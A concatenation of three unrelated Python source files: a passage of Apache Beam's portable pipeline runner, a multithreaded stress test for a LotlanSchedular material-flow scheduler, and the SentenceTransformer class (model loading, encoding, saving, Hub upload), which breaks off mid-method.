options_response = send_options_request()
def add_runner_options(parser):
for option in options_response.options:
try:
# no default values - we don't want runner options
# added unless they were specified by the user
add_arg_args = {'action': 'store', 'help': option.description}
if option.type == beam_job_api_pb2.PipelineOptionType.BOOLEAN:
add_arg_args['action'] = 'store_true' \
if option.default_value != 'true' else 'store_false'
elif option.type == beam_job_api_pb2.PipelineOptionType.INTEGER:
add_arg_args['type'] = int
elif option.type == beam_job_api_pb2.PipelineOptionType.ARRAY:
add_arg_args['action'] = 'append'
parser.add_argument("--%s" % option.name, **add_arg_args)
except Exception as e:
# ignore runner options that are already present
# only in this case is duplicate not treated as error
if 'conflicting option string' not in str(e):
raise
_LOGGER.debug("Runner option '%s' was already added" % option.name)
all_options = self.options.get_all_options(
add_extra_args_fn=add_runner_options,
retain_unknown_options=self._retain_unknown_options)
# TODO: Define URNs for options.
# convert int values: https://issues.apache.org/jira/browse/BEAM-5509
p_options = {
'beam:option:' + k + ':v1': (str(v) if type(v) == int else v)
for k,
v in all_options.items() if v is not None
}
return job_utils.dict_to_struct(p_options)
def prepare(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> beam_job_api_pb2.PrepareJobResponse
"""Prepare the job on the job service"""
return self.job_service.Prepare(
beam_job_api_pb2.PrepareJobRequest(
job_name='job',
pipeline=proto_pipeline,
pipeline_options=self.get_pipeline_options()),
timeout=self.timeout)
def stage(self, pipeline, artifact_staging_endpoint, staging_session_token):
# type: (...) -> Optional[Any]
"""Stage artifacts"""
if artifact_staging_endpoint:
stager = portable_stager.PortableStager(
grpc.insecure_channel(artifact_staging_endpoint),
staging_session_token)
resources = []
for _, env in pipeline.components.environments.items():
for dep in env.dependencies:
if dep.type_urn != common_urns.artifact_types.FILE.urn:
raise RuntimeError('unsupported artifact type %s' % dep.type_urn)
if dep.role_urn != common_urns.artifact_roles.STAGING_TO.urn:
raise RuntimeError('unsupported role type %s' % dep.role_urn)
type_payload = beam_runner_api_pb2.ArtifactFilePayload.FromString(
dep.type_payload)
role_payload = \
beam_runner_api_pb2.ArtifactStagingToRolePayload.FromString(
dep.role_payload)
resources.append((type_payload.path, role_payload.staged_name))
stager.stage_job_resources(resources, staging_location='')
retrieval_token = stager.commit_manifest()
else:
retrieval_token = None
return retrieval_token
def run(self, preparation_id, retrieval_token):
# type: (str, str) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""Run the job"""
try:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=preparation_id),
timeout=self.timeout)
# If there's an error, we don't always get it until we try to read.
# Fortunately, there's always an immediate current state published.
state_stream = itertools.chain([next(state_stream)], state_stream)
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=preparation_id),
timeout=self.timeout)
except Exception:
# TODO(BEAM-6442): Unify preparation_id and job_id for all runners.
state_stream = message_stream = None
# Run the job and wait for a result, we don't set a timeout here because
# it may take a long time for a job to complete and streaming
# jobs currently never return a response.
run_response = self.job_service.Run(
beam_job_api_pb2.RunJobRequest(
preparation_id=preparation_id, retrieval_token=retrieval_token))
if state_stream is None:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=run_response.job_id))
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=run_response.job_id))
return run_response.job_id, message_stream, state_stream
class PortableRunner(runner.PipelineRunner):
"""
Experimental: No backward compatibility guaranteed.
A BeamRunner that executes Python pipelines via the Beam Job API.
This runner is a stub and does not run the actual job.
This runner schedules the job on a job service. The responsibility of
running and managing the job lies with the job service used.
"""
def __init__(self):
self._dockerized_job_server = None # type: Optional[job_server.JobServer]
@staticmethod
def _create_environment(options):
# type: (PipelineOptions) -> environments.Environment
portable_options = options.view_as(PortableOptions)
# Do not set a Runner. Otherwise this can cause problems in Java's
# PipelineOptions, i.e. ClassNotFoundException, if the corresponding Runner
# does not exist in the Java SDK. In portability, the entry point is clearly
# defined via the JobService.
portable_options.view_as(StandardOptions).runner = None
environment_type = portable_options.environment_type
if not environment_type:
environment_urn = common_urns.environments.DOCKER.urn
elif environment_type.startswith('beam:env:'):
environment_urn = environment_type
else:
# e.g. handle LOOPBACK -> EXTERNAL
environment_type = ENV_TYPE_ALIASES.get(
environment_type, environment_type)
try:
environment_urn = getattr(
common_urns.environments, environment_type).urn
except AttributeError:
raise ValueError('Unknown environment type: %s' % environment_type)
env_class = environments.Environment.get_env_cls_from_urn(environment_urn)
return env_class.from_options(portable_options)
def default_job_server(self, options):
# type: (PipelineOptions) -> job_server.JobServer
# TODO Provide a way to specify a container Docker URL
# https://issues.apache.org/jira/browse/BEAM-6328
if not self._dockerized_job_server:
self._dockerized_job_server = job_server.StopOnExitJobServer(
job_server.DockerizedJobServer())
return self._dockerized_job_server
def create_job_service_handle(self, job_service, options):
return JobServiceHandle(job_service, options)
def create_job_service(self, options):
# type: (PipelineOptions) -> JobServiceHandle
"""
Start the job service and return a `JobServiceHandle`
"""
job_endpoint = options.view_as(PortableOptions).job_endpoint
if job_endpoint:
if job_endpoint == 'embed':
server = job_server.EmbeddedJobServer()
else:
job_server_timeout = options.view_as(PortableOptions).job_server_timeout
server = job_server.ExternalJobServer(job_endpoint, job_server_timeout)
else:
server = self.default_job_server(options)
return self.create_job_service_handle(server.start(), options)
@staticmethod
def get_proto_pipeline(pipeline, options):
# type: (Pipeline, PipelineOptions) -> beam_runner_api_pb2.Pipeline
portable_options = options.view_as(PortableOptions)
proto_pipeline = pipeline.to_runner_api(
default_environment=PortableRunner._create_environment(
portable_options))
# Some runners won't detect the GroupByKey transform unless it has no
# subtransforms. Remove all sub-transforms until BEAM-4605 is resolved.
for _, transform_proto in list(
proto_pipeline.components.transforms.items()):
if transform_proto.spec.urn == common_urns.primitives.GROUP_BY_KEY.urn:
for sub_transform in transform_proto.subtransforms:
del proto_pipeline.components.transforms[sub_transform]
del transform_proto.subtransforms[:]
# Preemptively apply combiner lifting, until all runners support it.
# These optimizations commute and are idempotent.
pre_optimize = options.view_as(DebugOptions).lookup_experiment(
'pre_optimize', 'lift_combiners').lower()
if not options.view_as(StandardOptions).streaming:
flink_known_urns = frozenset([
common_urns.composites.RESHUFFLE.urn,
common_urns.primitives.IMPULSE.urn,
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn
])
if pre_optimize == 'none':
pass
elif pre_optimize == 'all':
proto_pipeline = translations.optimize_pipeline(
proto_pipeline,
phases=[
translations.annotate_downstream_side_inputs,
translations.annotate_stateful_dofns_as_roots,
translations.fix_side_input_pcoll_coders,
translations.lift_combiners,
translations.expand_sdf,
translations.fix_flatten_coders,
# fn_api_runner_transforms.sink_flattens,
translations.greedily_fuse,
translations.read_to_impulse,
translations.extract_impulse_stages,
translations.remove_data_plane_ops,
translations.sort_stages
],
known_runner_urns=flink_known_urns)
else:
phases = []
for phase_name in pre_optimize.split(','):
# For now, these are all we allow.
if phase_name in 'lift_combiners':
phases.append(getattr(translations, phase_name))
else:
raise ValueError(
'Unknown or inapplicable phase for pre_optimize: %s' %
phase_name)
proto_pipeline = translations.optimize_pipeline(
proto_pipeline,
phases=phases,
known_runner_urns=flink_known_urns,
partial=True)
return proto_pipeline
def run_pipeline(self, pipeline, options):
# type: (Pipeline, PipelineOptions) -> PipelineResult
portable_options = options.view_as(PortableOptions)
# TODO: https://issues.apache.org/jira/browse/BEAM-5525
# portable runner specific default
if options.view_as(SetupOptions).sdk_location == 'default':
options.view_as(SetupOptions).sdk_location = 'container'
# This is needed as we start a worker server if one is requested
# but none is provided.
if portable_options.environment_type == 'LOOPBACK':
use_loopback_process_worker = options.view_as(
DebugOptions).lookup_experiment('use_loopback_process_worker', False)
portable_options.environment_config, server = (
worker_pool_main.BeamFnExternalWorkerPoolServicer.start(
state_cache_size=sdk_worker_main._get_state_cache_size(options),
data_buffer_time_limit_ms=
sdk_worker_main._get_data_buffer_time_limit_ms(options),
use_process=use_loopback_process_worker))
cleanup_callbacks = [functools.partial(server.stop, 1)]
else:
cleanup_callbacks = []
proto_pipeline = self.get_proto_pipeline(pipeline, options)
job_service_handle = self.create_job_service(options)
job_id, message_stream, state_stream = \
job_service_handle.submit(proto_pipeline)
result = PipelineResult(
job_service_handle.job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks)
if cleanup_callbacks:
# We wait here to ensure that we run the cleanup callbacks.
logging.info(
'Waiting until the pipeline has finished because the '
'environment "%s" has started a component necessary for the '
'execution.',
portable_options.environment_type)
result.wait_until_finish()
return result
class PortableMetrics(metric.MetricResults):
def __init__(self, job_metrics_response):
metrics = job_metrics_response.metrics
self.attempted = portable_metrics.from_monitoring_infos(metrics.attempted)
self.committed = portable_metrics.from_monitoring_infos(metrics.committed)
@staticmethod
def _combine(committed, attempted, filter):
all_keys = set(committed.keys()) | set(attempted.keys())
return [
MetricResult(key, committed.get(key), attempted.get(key))
for key in all_keys if metric.MetricResults.matches(filter, key)
]
def query(self, filter=None):
counters, distributions, gauges = [
self._combine(x, y, filter)
for x, y in zip(self.committed, self.attempted)
]
return {
self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges
}
class PipelineResult(runner.PipelineResult):
def __init__(
self,
job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks=()):
super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
self._message_stream = message_stream
self._state_stream = state_stream
self._cleanup_callbacks = cleanup_callbacks
self._metrics = None
def cancel(self):
try:
self._job_service.Cancel(
beam_job_api_pb2.CancelJobRequest(job_id=self._job_id))
finally:
self._cleanup()
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(
runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
def metrics(self):
if not self._metrics:
job_metrics_response = self._job_service.GetJobMetrics(
beam_job_api_pb2.GetJobMetricsRequest(job_id=self._job_id))
self._metrics = PortableMetrics(job_metrics_response)
return self._metrics
def _last_error_message(self):
# Filter only messages with the "message_response" and error messages.
messages = [
m.message_response for m in self._messages
if m.HasField('message_response')
]
error_messages = [
m for m in messages
if m.importance == beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR
]
if error_messages:
return error_messages[-1].message_text
else:
return 'unknown error'
def wait_until_finish(self):
def read_messages():
previous_state = -1
for message in self._message_stream:
if message.HasField('message_response'):
logging.log(
MESSAGE_LOG_LEVELS[message.message_response.importance],
"%s",
message.message_response.message_text)
else:
current_state = message.state_response.state
if current_state != previous_state:
_LOGGER.info(
"Job state changed to %s",
self._runner_api_state_to_pipeline_state(current_state))
previous_state = current_state
self._messages.append(message)
t = threading.Thread(target=read_messages, name='wait_until_finish_read')
t.daemon = True
t.start()
try:
for state_response in self._state_stream:
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
# Wait for any last messages.
t.join(10)
break
if self._state != runner.PipelineState.DONE:
raise RuntimeError(
'Pipeline %s failed in state %s: %s' %
(self._job_id, self._state, self._last_error_message()))
return self._state
finally:
self._cleanup()
def _cleanup(self):
has_exception = None
for callback in self._cleanup_callbacks:
try:
callback()
except Exception:
has_exception = True
self._cleanup_callbacks = ()
if has_exception:
raise
|
stress_test.py | # standard libraries
import sys
import os
from os import walk
from os.path import splitext, join
import threading
import unittest
import time
# 3rd party packages
import xmlrunner
from snakes.nets import Marking, MultiSet
sys.path.append(os.path.abspath("../lotlan_schedular"))
# local sources
import lotlan_schedular.helpers as helpers
from lotlan_schedular.api.event import Event
from lotlan_schedular.schedular import LotlanSchedular
from lotlan_schedular.api.location import Location
from lotlan_schedular.logger.sqlite_logger import SQLiteLogger
from lotlan_schedular.defines import SQLCommands
# uninstall possible old lotlan_schedular packages
# so current code is used not old one
os.system("pip3 uninstall lotlan_schedular")
def test_simple_task():
f = open("etc/examples/Scheduling/001_simple_task.tl")
lotlan_logic = LotlanSchedular(f.read(), True)
material_flows = lotlan_logic.get_materialflows()
material_flow = material_flows[0]
material_flow.start()
material_flow.fire_event("0",Event("task_finished", "", "Boolean", value=True)) # should not be allowed
material_flow.fire_event("0", Event("to_done", "", "Boolean", value=True))
material_flow.fire_event("0", Event("moved_to_location", "", "Boolean", value=True))
material_flow.fire_event("0", Event("moved_to_location", "", "Boolean", value=True))
f.close()
def main():
threads=[]
num_threads = 500
for i in range(num_threads):
threads.append(threading.Thread(target=test_simple_task))
start = time.time()
for thread in threads:
thread.start()
for thread in threads:
thread.join()
end = time.time()
print("Runtime with {} threads: {} seconds".format(num_threads, end-start))
if __name__ == "__main__":
main()
|
SentenceTransformer.py | import json
import logging
import os
import shutil
import stat
from collections import OrderedDict
from typing import List, Dict, Tuple, Iterable, Type, Union, Callable, Optional
import requests
import numpy as np
from numpy import ndarray
import transformers
from huggingface_hub import HfApi, HfFolder, Repository, hf_hub_url, cached_download
import torch
from torch import nn, Tensor, device
from torch.optim import Optimizer
from torch.utils.data import DataLoader
import torch.multiprocessing as mp
from tqdm.autonotebook import trange
import math
import queue
import tempfile
from distutils.dir_util import copy_tree
from . import __MODEL_HUB_ORGANIZATION__
from .evaluation import SentenceEvaluator
from .util import import_from_string, batch_to_device, fullname, snapshot_download
from .models import Transformer, Pooling, Dense
from .model_card_templates import ModelCardTemplate
from . import __version__
logger = logging.getLogger(__name__)
class SentenceTransformer(nn.Sequential):
"""
Loads or create a SentenceTransformer model, that can be used to map sentences / text to embeddings.
:param model_name_or_path: If it is a filepath on disc, it loads the model from that path. If it is not a path, it first tries to download a pre-trained SentenceTransformer model. If that fails, tries to construct a model from Huggingface models repository with that name.
:param modules: This parameter can be used to create custom SentenceTransformer models from scratch.
:param device: Device (like 'cuda' / 'cpu') that should be used for computation. If None, checks if a GPU can be used.
:param cache_folder: Path to store models
"""
def __init__(self, model_name_or_path: Optional[str] = None, modules: Optional[Iterable[nn.Module]] = None, device: Optional[str] = None, cache_folder: Optional[str] = None):
self._model_card_vars = {}
self._model_card_text = None
self._model_config = {}
if cache_folder is None:
cache_folder = os.getenv('SENTENCE_TRANSFORMERS_HOME')
if cache_folder is None:
try:
from torch.hub import _get_torch_home
torch_cache_home = _get_torch_home()
except ImportError:
torch_cache_home = os.path.expanduser(os.getenv('TORCH_HOME', os.path.join(os.getenv('XDG_CACHE_HOME', '~/.cache'), 'torch')))
cache_folder = os.path.join(torch_cache_home, 'sentence_transformers')
if model_name_or_path is not None and model_name_or_path != "":
logger.info("Load pretrained SentenceTransformer: {}".format(model_name_or_path))
#Old models that don't belong to any organization
basic_transformer_models = ['albert-base-v1', 'albert-base-v2', 'albert-large-v1', 'albert-large-v2', 'albert-xlarge-v1', 'albert-xlarge-v2', 'albert-xxlarge-v1', 'albert-xxlarge-v2', 'bert-base-cased-finetuned-mrpc', 'bert-base-cased', 'bert-base-chinese', 'bert-base-german-cased', 'bert-base-german-dbmdz-cased', 'bert-base-german-dbmdz-uncased', 'bert-base-multilingual-cased', 'bert-base-multilingual-uncased', 'bert-base-uncased', 'bert-large-cased-whole-word-masking-finetuned-squad', 'bert-large-cased-whole-word-masking', 'bert-large-cased', 'bert-large-uncased-whole-word-masking-finetuned-squad', 'bert-large-uncased-whole-word-masking', 'bert-large-uncased', 'camembert-base', 'ctrl', 'distilbert-base-cased-distilled-squad', 'distilbert-base-cased', 'distilbert-base-german-cased', 'distilbert-base-multilingual-cased', 'distilbert-base-uncased-distilled-squad', 'distilbert-base-uncased-finetuned-sst-2-english', 'distilbert-base-uncased', 'distilgpt2', 'distilroberta-base', 'gpt2-large', 'gpt2-medium', 'gpt2-xl', 'gpt2', 'openai-gpt', 'roberta-base-openai-detector', 'roberta-base', 'roberta-large-mnli', 'roberta-large-openai-detector', 'roberta-large', 't5-11b', 't5-3b', 't5-base', 't5-large', 't5-small', 'transfo-xl-wt103', 'xlm-clm-ende-1024', 'xlm-clm-enfr-1024', 'xlm-mlm-100-1280', 'xlm-mlm-17-1280', 'xlm-mlm-en-2048', 'xlm-mlm-ende-1024', 'xlm-mlm-enfr-1024', 'xlm-mlm-enro-1024', 'xlm-mlm-tlm-xnli15-1024', 'xlm-mlm-xnli15-1024', 'xlm-roberta-base', 'xlm-roberta-large-finetuned-conll02-dutch', 'xlm-roberta-large-finetuned-conll02-spanish', 'xlm-roberta-large-finetuned-conll03-english', 'xlm-roberta-large-finetuned-conll03-german', 'xlm-roberta-large', 'xlnet-base-cased', 'xlnet-large-cased']
if os.path.exists(model_name_or_path):
#Load from path
model_path = model_name_or_path
else:
#Not a path, load from hub
if '\\' in model_name_or_path or model_name_or_path.count('/') > 1:
raise ValueError("Path {} not found".format(model_name_or_path))
if '/' not in model_name_or_path and model_name_or_path.lower() not in basic_transformer_models:
# A model from sentence-transformers
model_name_or_path = __MODEL_HUB_ORGANIZATION__ + "/" + model_name_or_path
model_path = os.path.join(cache_folder, model_name_or_path.replace("/", "_"))
if not os.path.exists(model_path):
# Download from hub
model_path_tmp = snapshot_download(model_name_or_path,
cache_dir=cache_folder,
library_name='sentence-transformers',
library_version=__version__,
ignore_files=['flax_model.msgpack', 'rust_model.ot', 'tf_model.h5'])
os.rename(model_path_tmp, model_path)
if os.path.exists(os.path.join(model_path, 'modules.json')): #Load as SentenceTransformer model
modules = self._load_sbert_model(model_path)
else: #Load with AutoModel
modules = self._load_auto_model(model_path)
if modules is not None and not isinstance(modules, OrderedDict):
modules = OrderedDict([(str(idx), module) for idx, module in enumerate(modules)])
super().__init__(modules)
if device is None:
device = "cuda" if torch.cuda.is_available() else "cpu"
logger.info("Use pytorch device: {}".format(device))
self._target_device = torch.device(device)
def encode(self, sentences: Union[str, List[str]],
batch_size: int = 32,
show_progress_bar: bool = None,
output_value: str = 'sentence_embedding',
convert_to_numpy: bool = True,
convert_to_tensor: bool = False,
device: str = None,
normalize_embeddings: bool = False) -> Union[List[Tensor], ndarray, Tensor]:
"""
Computes sentence embeddings
:param sentences: the sentences to embed
:param batch_size: the batch size used for the computation
:param show_progress_bar: Output a progress bar when encode sentences
:param output_value: Default sentence_embedding, to get sentence embeddings. Can be set to token_embeddings to get wordpiece token embeddings.
:param convert_to_numpy: If true, the output is a list of numpy vectors. Else, it is a list of pytorch tensors.
:param convert_to_tensor: If true, you get one large tensor as return. Overwrites any setting from convert_to_numpy
:param device: Which torch.device to use for the computation
:param normalize_embeddings: If set to true, returned vectors will have length 1. In that case, the faster dot-product (util.dot_score) instead of cosine similarity can be used.
:return:
By default, a list of tensors is returned. If convert_to_tensor, a stacked tensor is returned. If convert_to_numpy, a numpy matrix is returned.
"""
self.eval()
if show_progress_bar is None:
show_progress_bar = (logger.getEffectiveLevel()==logging.INFO or logger.getEffectiveLevel()==logging.DEBUG)
if convert_to_tensor:
convert_to_numpy = False
if output_value == 'token_embeddings':
convert_to_tensor = False
convert_to_numpy = False
input_was_string = False
if isinstance(sentences, str) or not hasattr(sentences, '__len__'): #Cast an individual sentence to a list with length 1
sentences = [sentences]
input_was_string = True
if device is None:
device = self._target_device
self.to(device)
all_embeddings = []
length_sorted_idx = np.argsort([-self._text_length(sen) for sen in sentences])
sentences_sorted = [sentences[idx] for idx in length_sorted_idx]
for start_index in trange(0, len(sentences), batch_size, desc="Batches", disable=not show_progress_bar):
sentences_batch = sentences_sorted[start_index:start_index+batch_size]
features = self.tokenize(sentences_batch)
features = batch_to_device(features, device)
with torch.no_grad():
out_features = self.forward(features)
if output_value == 'token_embeddings':
embeddings = []
for token_emb, attention in zip(out_features[output_value], out_features['attention_mask']):
last_mask_id = len(attention)-1
while last_mask_id > 0 and attention[last_mask_id].item() == 0:
last_mask_id -= 1
embeddings.append(token_emb[0:last_mask_id+1])
else: #Sentence embeddings
embeddings = out_features[output_value]
embeddings = embeddings.detach()
if normalize_embeddings:
embeddings = torch.nn.functional.normalize(embeddings, p=2, dim=1)
# fixes for #522 and #487 to avoid oom problems on gpu with large datasets
if convert_to_numpy:
embeddings = embeddings.cpu()
all_embeddings.extend(embeddings)
all_embeddings = [all_embeddings[idx] for idx in np.argsort(length_sorted_idx)]
if convert_to_tensor:
all_embeddings = torch.stack(all_embeddings)
elif convert_to_numpy:
all_embeddings = np.asarray([emb.numpy() for emb in all_embeddings])
if input_was_string:
all_embeddings = all_embeddings[0]
return all_embeddings
def start_multi_process_pool(self, target_devices: List[str] = None):
"""
Starts multi process to process the encoding with several, independent processes.
This method is recommended if you want to encode on multiple GPUs. It is advised
to start only one process per GPU. This method works together with encode_multi_process
:param target_devices: PyTorch target devices, e.g. cuda:0, cuda:1... If None, all available CUDA devices will be used
:return: Returns a dict with the target processes, an input queue and and output queue.
"""
if target_devices is None:
if torch.cuda.is_available():
target_devices = ['cuda:{}'.format(i) for i in range(torch.cuda.device_count())]
else:
logger.info("CUDA is not available. Start 4 CPU worker")
target_devices = ['cpu']*4
logger.info("Start multi-process pool on devices: {}".format(', '.join(map(str, target_devices))))
ctx = mp.get_context('spawn')
input_queue = ctx.Queue()
output_queue = ctx.Queue()
processes = []
for cuda_id in target_devices:
p = ctx.Process(target=SentenceTransformer._encode_multi_process_worker, args=(cuda_id, self, input_queue, output_queue), daemon=True)
p.start()
processes.append(p)
return {'input': input_queue, 'output': output_queue, 'processes': processes}
@staticmethod
def stop_multi_process_pool(pool):
"""
Stops all processes started with start_multi_process_pool
"""
for p in pool['processes']:
p.terminate()
for p in pool['processes']:
p.join()
p.close()
pool['input'].close()
pool['output'].close()
def encode_multi_process(self, sentences: List[str], pool: Dict[str, object], batch_size: int = 32, chunk_size: int = None):
"""
This method allows to run encode() on multiple GPUs. The sentences are chunked into smaller packages
and sent to individual processes, which encode these on the different GPUs. This method is only suitable
for encoding large sets of sentences
:param sentences: List of sentences
:param pool: A pool of workers started with SentenceTransformer.start_multi_process_pool
:param batch_size: Encode sentences with batch size
:param chunk_size: Sentences are chunked and sent to the individual processes. If none, it determine a sensible size.
:return: Numpy matrix with all embeddings
"""
if chunk_size is None:
chunk_size = min(math.ceil(len(sentences) / len(pool["processes"]) / 10), 5000)
logger.info("Chunk data into packages of size {}".format(chunk_size))
input_queue = pool['input']
last_chunk_id = 0
chunk = []
for sentence in sentences:
chunk.append(sentence)
if len(chunk) >= chunk_size:
input_queue.put([last_chunk_id, batch_size, chunk])
last_chunk_id += 1
chunk = []
if len(chunk) > 0:
input_queue.put([last_chunk_id, batch_size, chunk])
last_chunk_id += 1
output_queue = pool['output']
results_list = sorted([output_queue.get() for _ in range(last_chunk_id)], key=lambda x: x[0])
embeddings = np.concatenate([result[1] for result in results_list])
return embeddings
@staticmethod
def _encode_multi_process_worker(target_device: str, model, input_queue, results_queue):
"""
Internal working process to encode sentences in multi-process setup
"""
while True:
try:
id, batch_size, sentences = input_queue.get()
embeddings = model.encode(sentences, device=target_device, show_progress_bar=False, convert_to_numpy=True, batch_size=batch_size)
results_queue.put([id, embeddings])
except queue.Empty:
break
def get_max_seq_length(self):
"""
Returns the maximal sequence length for input the model accepts. Longer inputs will be truncated
"""
if hasattr(self._first_module(), 'max_seq_length'):
return self._first_module().max_seq_length
return None
def tokenize(self, texts: Union[List[str], List[Dict], List[Tuple[str, str]]]):
"""
Tokenizes the texts
"""
return self._first_module().tokenize(texts)
def get_sentence_features(self, *features):
return self._first_module().get_sentence_features(*features)
def get_sentence_embedding_dimension(self):
for mod in reversed(self._modules.values()):
sent_embedding_dim_method = getattr(mod, "get_sentence_embedding_dimension", None)
if callable(sent_embedding_dim_method):
return sent_embedding_dim_method()
return None
def _first_module(self):
"""Returns the first module of this sequential embedder"""
return self._modules[next(iter(self._modules))]
def _last_module(self):
"""Returns the last module of this sequential embedder"""
return self._modules[next(reversed(self._modules))]
def save(self, path: str, model_name: Optional[str] = None, create_model_card: bool = True):
"""
Saves all elements for this seq. sentence embedder into different sub-folders
:param path: Path on disc
:param model_name: Optional model name
:param create_model_card: If True, create a README.md with basic information about this model
"""
if path is None:
return
os.makedirs(path, exist_ok=True)
logger.info("Save model to {}".format(path))
modules_config = []
#Save some model info
if '__version__' not in self._model_config:
self._model_config['__version__'] = {
'sentence_transformers': __version__,
'transformers': transformers.__version__,
'pytorch': torch.__version__,
}
with open(os.path.join(path, 'config_sentence_transformers.json'), 'w') as fOut:
json.dump(self._model_config, fOut, indent=2)
#Save modules
for idx, name in enumerate(self._modules):
module = self._modules[name]
if idx == 0 and isinstance(module, Transformer): #Save transformer model in the main folder
model_path = path + "/"
else:
model_path = os.path.join(path, str(idx)+"_"+type(module).__name__)
os.makedirs(model_path, exist_ok=True)
module.save(model_path)
modules_config.append({'idx': idx, 'name': name, 'path': os.path.basename(model_path), 'type': type(module).__module__})
with open(os.path.join(path, 'modules.json'), 'w') as fOut:
json.dump(modules_config, fOut, indent=2)
# Create model card
if create_model_card:
self._create_model_card(path, model_name)
def _create_model_card(self, path: str, model_name: Optional[str] = None):
"""
Create an automatic model and stores it in path
"""
if self._model_card_text is not None and len(self._model_card_text) > 0:
model_card = self._model_card_text
else:
tags = ModelCardTemplate.__TAGS__.copy()
model_card = ModelCardTemplate.__MODEL_CARD__
if len(self._modules) == 2 and isinstance(self._first_module(), Transformer) and isinstance(self._last_module(), Pooling) and self._last_module().get_pooling_mode_str() in ['cls', 'max', 'mean']:
pooling_module = self._last_module()
pooling_mode = pooling_module.get_pooling_mode_str()
model_card = model_card.replace("{USAGE_TRANSFORMERS_SECTION}", ModelCardTemplate.__USAGE_TRANSFORMERS__)
pooling_fct_name, pooling_fct = ModelCardTemplate.model_card_get_pooling_function(pooling_mode)
model_card = model_card.replace("{POOLING_FUNCTION}", pooling_fct).replace("{POOLING_FUNCTION_NAME}", pooling_fct_name).replace("{POOLING_MODE}", pooling_mode)
tags.append('transformers')
# Print full model
model_card = model_card.replace("{FULL_MODEL_STR}", str(self))
# Add tags
model_card = model_card.replace("{TAGS}", "\n".join(["- "+t for t in tags]))
# Add dim info
self._model_card_vars["{NUM_DIMENSIONS}"] = self.get_sentence_embedding_dimension()
# Replace vars we created while using the model
for name, value in self._model_card_vars.items():
model_card = model_card.replace(name, str(value))
# Replace remaining vars with default values
for name, value in ModelCardTemplate.__DEFAULT_VARS__.items():
model_card = model_card.replace(name, str(value))
if model_name is not None:
model_card = model_card.replace("{MODEL_NAME}", model_name.strip())
with open(os.path.join(path, "README.md"), "w", encoding='utf8') as fOut:
fOut.write(model_card.strip())
def save_to_hub(self,
repo_name: str,
organization: Optional[str] = None,
private: Optional[bool] = None,
commit_message: str = "Add new SentenceTransformer model.",
local_model_path: Optional[str] = None,
exist_ok: bool = False,
replace_model_card: bool = False):
"""
Uploads all elements of this Sentence Transformer to a new HuggingFace Hub repository.
:param repo_name: Repository name for your model in the Hub.
:param organization: Organization in which you want to push your model or tokenizer (you must be a member of this organization).
:param private: Set to true, for hosting a prive model
:param commit_message: Message to commit while pushing.
:param local_model_path: Path of the model locally. If set, this file path will be uploaded. Otherwise, the current model will be uploaded
:param exist_ok: If true, saving to an existing repository is OK. If false, saving only to a new repository is possible
:param replace_model_card: If true, replace an existing model card in the hub with the automatically created model card
:return: The url of the commit of your model in the given repository.
"""
token = HfFolder.get_token()
if token is None:
raise ValueError("You must login to the Hugging Face hub on this computer by typing `transformers-cli login`.")
if '/' in repo_name:
splits = repo_name.split('/', maxsplit=1)
if organization is None or organization == splits[0]:
organization = splits[0]
repo_name = splits[1]
else:
raise ValueError("You passed and invalid repository name: {}.".format(repo_name))
endpoint = "https://huggingface.co"
repo_url = HfApi(endpoint=endpoint).create_repo(
token,
repo_name,
organization=organization,
private=private,
repo_type=None,
exist_ok=exist_ok,
)
full_model_name = repo_url[len(endpoint)+1:].strip("/")
with tempfile.TemporaryDirectory() as tmp_dir:
# First create the repo (and clone its content if it's nonempty).
logging.info("Create repository and clone it if it exists")
repo = Repository(tmp_dir, clone_from=repo_url)
# If user provides local files, copy them.
if local_model_path:
copy_tree(local_model_path, tmp_dir)
else: # Else, save model directly into local repo.
create_model_card = replace_model_card or not os.path.exists(os.path.join(tmp_dir, 'README.md'))
self.save(tmp_dir, model_name=full_model_name, create_model_card=create_model_card)
#Find files larger 5M and track with git-lfs
large_files = []
for root, dirs, files in os.walk(tmp_dir):
for filename in files:
file_path = os.path.join(root, filename)
rel_path = os.path.relpath(file_path, tmp_dir)
if os.path.getsize(file_path) > (5 * 1024 * 1024):
large_files.append(rel_path)
if len(large_files) > 0:
logging.info("Track files with git lfs: {}".format(", ".join(large_files)))
repo.lfs_track(large_files)
logging.info("Push model to the hub. This might take a while")
push_return = repo.push_to_hub(commit_message=commit_message)
def on_rm_error(func, path, exc_info):
# path contains the path of the file that couldn't be removed
# let's just assume that it's read-only and unlink it.
try:
os.chmod(path, stat.S_IWRITE)
os.unlink(path)
except:
pass
# Remove .git folder. On Windows, the .git folder might be read-only and cannot be deleted
# Hence, try to set write permissions on error
try:
for f in os.listdir(tmp_dir):
shutil.rmtree(os.path.join(tmp_dir, f), onerror=on_rm_error)
except Exception as e:
logging.warning("Error when deleting temp folder: {}".format(str(e)))
pass
return push_return
def smart_batching_collate(self, batch):
"""
Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model
Here, batch is a list of tuples: [(tokens, label), ...]
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
num_texts = len(batch[0].texts)
texts = [[] for _ in range(num_texts)]
